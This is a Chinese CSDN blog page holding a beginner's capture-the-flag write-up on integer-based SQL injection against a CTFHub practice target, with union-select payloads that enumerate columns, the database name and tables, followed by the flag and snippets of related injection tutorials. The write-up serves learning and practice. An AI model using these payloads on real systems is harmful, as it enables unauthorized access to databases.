(sql初学实践1)SQL 整数型注入--wp

最新推荐文章于 2024-03-29 16:48:00 发布
最新推荐文章于 2024-03-29 16:48:00 发布
阅读量640 收藏
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64417923/article/details/124560998
版权
本文介绍了SQL整数型注入的基本步骤,通过环境观察发现输入限制,利用`order by`判断列数,确定存在两列。接着,获取了数据库名称`sqli`,并爆出了两个表名`flag`和`news`。最终,成功查询到`flag`内容:ctfhub{ef2998d666876bc013b9ae87},完成挑战。
摘要由CSDN通过智能技术生成

进入环境:

只有输入1和2有回显

接着,判断列数:

依次输入

id=1 order by 1

id=1 order by 2

id=1 order by 3

到3时,没有回显,报错,说明这时表格只有两列

下一步

取得数据库名称:

1 and 0 union select 1,database()

 s数据库名称为sqli

下一步

爆表名

-1 union select  1,group_concat(table_name) from informat
最低0.47元/天 解锁文章
m0_64417923
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
linux常用命令-part3
热门推荐
chinayuan的专栏
05-01 2万+
中文怎么发音 Ubuntu 有奔头,乌版图 Fedora 费德勒,菲朵拉 Debian 迪扁,德槟 CentOS 桑托斯 森头斯       Linux发展历史: 1) RedHat ---> 1.RedHat                2.CentOS                3.Fedora  桌面图形系统        rpm, yum 命令 2)
SQL 整数形注入
MZa1213123的博客
03-02 2671
CTFHub SQL 整数型注入 先 and 1=1 有回显 接着 and 1=2 无回显也就错误页面 判断有 SQL 注入 order by x 爆出几个字段 order by 3 无回显 证明只有两个字段 union 联合查询 常用函数 user() database() session_usr() @@version @@basedir @@datadir @@version_compile_os 得到数据库名后 接着继续爆出该数据库的表名(奇怪.
sql注入整数型注入
最新发布
2401_82760239的博客
03-29 1045
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
SQL注入整数型注入
noob_3000的博客
08-07 2904
CTFHUB整数型SQL注入
sql整数型/字符型 注入
qq_44985415的博客
08-29 1512
整数型注入 1.检查是否存在注入 and 1=1 返回正确 and 1=2 返回错误 2.猜出字段数 order by x(数字) 得出字段数 3.然后就是爆数据库名information schema三步 ?id=1 and 1=2 union select 1,database() 得到数据库名称sqli 4.爆表名 ?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where
常规SQL注入(整型注入
hxhabcd123的博客
08-29 1512
常规SQL注入(整型注入
强网杯 WriteUp By Nu1L
08-02
这类题目可能包含常见的Web漏洞,如SQL注入、XSS攻击、CSRF等,要求参赛者通过探测和测试来发现并利用这些漏洞。 9. EasyLogin(简易登录): 可能涉及密码学、身份验证机制或弱口令问题,参赛者需要找到正确的...
MySQL数据库入门指南】:初学者必备的数据库基础知识,开启数据库探索之旅
[php显示数据库](https://blog.searchmyexpert.com/wp-content/uploads/2024/03/Banners-2024-01-30T120240.183-1920w-1024x434.png) # 1. MySQL数据库简介** MySQL是一种开源的关系型数据库管理系统(RDBMS),以...
web安全学习-------2.sql整数型注入
阿柠xn
03-10 336
这是作者遇到的一个题目,当然这个题目也很直白,整数型注入。 我们一次填入1,2,3会发现只有1和2有回显,3并没有回显。说明可以查询到的数据有两个。 接着我们测试一下数据有几列: 测试列数: GET:id=1 order by 3# POST:id=1’ order by 3# 我们可以看到3并没有回显,2的时候正常显示,所以数据一共两列。 接下来就是尝试联合查询了,记得把前面的查询数据置空...
CTFHub技能书解题笔记-SQL注入-整数型注入
qq_43006864的博客
12-21 2079
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数型注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2357
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1334
整型SQL注入
SQL注入——整数注入
qidiandexiaowu
04-07 248
前言:前几天(很久以前)在ctfhub上做了一道整形注入的题。 什么是整形注入呐。点这! 直接入题!!! 1.先判断是否存在注入。 payload: ?id=1 and 1=1 看到这里的正常回显。 然后 ?id=1 and 1=2 回显错误。可以判断出是整形。 2.判断列数。 order by语句。 ?id=1 order by 1 1 2 3…直到出现报错。 可以判断出只有...
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 909
CTFHub-sql注入-整数型注入
sql注入
Gagatj_的博客
04-26 321
substr(str,pos,len) //将str从下标为pos的位置开始截取len长度的字符。table_schema:mysql中information_schema.tables表的一个列,存储着数据库中所有表所属的数据库名称。,‘单引号让字符型查询语句闭合,#将后面的语句注释掉,若为字符型查询语句应有回显,此处没有,判断为整数型注入。information_schema:存储着mysql中所以数据库,表,列,索引等的元数据信息。表示分别返回flag字符串中左边的16个字符串和右边的字符串。
ctfhub之SQL整数型注入(借助sqlmap工具)
hwy2506451901的博客
04-05 1011
关于这道题呢,我还没有看到用sqlmap工具解答的,正好刚刚做完,感觉还挺简单的,所以决定分享一下过程,大佬可以绕过啦嘿嘿嘿,大家也可以去下载一个试试这个工具,希望能有一点帮助吧! 我们启动环境,进入网址看到让我们输入一个1试试,那我们就输入试试吧 可以看到我们输入的id写在了地址栏当中,说明采用的提交方式是get,下面就详细介绍这道题采用sqlmap的解法: 1.检查是否存在漏洞: 将地址栏的...
CTFHUB-SQL注入-整数型注入(一)
sev1n的博客
03-01 2285
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数型注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值